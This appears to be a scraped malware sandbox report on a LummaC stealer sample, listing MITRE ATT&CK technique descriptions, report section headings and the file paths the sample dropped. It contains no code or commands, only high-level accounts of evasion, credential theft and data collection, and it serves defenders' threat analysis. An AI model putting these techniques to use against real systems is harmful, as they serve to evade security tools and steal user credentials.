Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TNyOrM6mIM.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\768400\Climb.com

C:\Users\user\AppData\Local\Temp\768400\V

C:\Users\user\AppData\Local\Temp\Alt

C:\Users\user\AppData\Local\Temp\Articles

C:\Users\user\AppData\Local\Temp\Attractions

C:\Users\user\AppData\Local\Temp\Beaches

C:\Users\user\AppData\Local\Temp\Cooked

C:\Users\user\AppData\Local\Temp\Enrolled

C:\Users\user\AppData\Local\Temp\Fingers

C:\Users\user\AppData\Local\Temp\Maternity

Windows Analysis Report
TNyOrM6mIM.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre